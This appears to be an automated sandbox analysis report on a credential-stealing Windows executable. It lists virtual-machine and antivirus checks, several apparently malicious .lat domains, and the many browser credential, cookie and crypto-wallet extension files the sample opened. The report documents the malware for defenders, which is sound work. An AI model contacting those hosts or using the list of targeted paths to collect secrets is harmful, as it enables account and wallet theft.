              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
              Source: Amcache.hve.1.dr | Binary or memory string: VMware20,1
              Source: Amcache.hve.1.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.1.dr | Binary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.1.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: Amcache.hve.1.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.1.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.1.dr | Binary or memory string: VMware PCI VMCI Bus Device
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: Amcache.hve.1.dr | Binary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.1.dr | Binary or memory string: VMware Virtual RAM
              Source: Amcache.hve.1.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: Amcache.hve.1.dr | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: Amcache.hve.1.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: Amcache.hve.1.dr | Binary or memory string: VMware Virtual USB Mouse
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: Amcache.hve.1.dr | Binary or memory string: vmci.syshbin
              Source: Amcache.hve.1.dr | Binary or memory string: VMware, Inc.
              Source: Amcache.hve.1.dr | Binary or memory string: VMware20,1hbin@
              Source: Amcache.hve.1.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: Amcache.hve.1.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.1.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033AB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696492231p
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: Amcache.hve.1.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.1.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: Amcache.hve.1.dr | Binary or memory string: vmci.syshbin`
              Source: Amcache.hve.1.dr | Binary or memory string: \driver\vmci,\driver\pci
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: Amcache.hve.1.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.1.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: finickypwk.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: shoefeatthe.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: savorraiykj.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: kickykiduz.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: miniatureyu.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: leggelatez.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: washyceehsu.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: bloodyswif.lat
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Amcache.hve.1.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.1.dr | Binary or memory string: msmpeng.exe
              Source: Amcache.hve.1.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.1.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1528399384.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528747232.0000000000727000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597973358.0000000000693000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1540482872.0000000000694000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.1.dr | Binary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: yTRd6nkLWV.exe PID: 7532, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: yTRd6nkLWV.exe, 00000001.00000003.1486470955.0000000000727000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: llets/Electrum-LTC
Source: yTRd6nkLWV.exe, 00000001.00000003.1486470955.0000000000727000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: qllets/ElectronCash
Source: yTRd6nkLWV.exe | String found in binary or memory: Jaxx Liberty
Source: yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: yTRd6nkLWV.exe, 00000001.00000003.1499124135.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
Source: yTRd6nkLWV.exe, 00000001.00000003.1515045106.0000000000720000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: yTRd6nkLWV.exe, 00000001.00000003.1517807801.0000000000675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
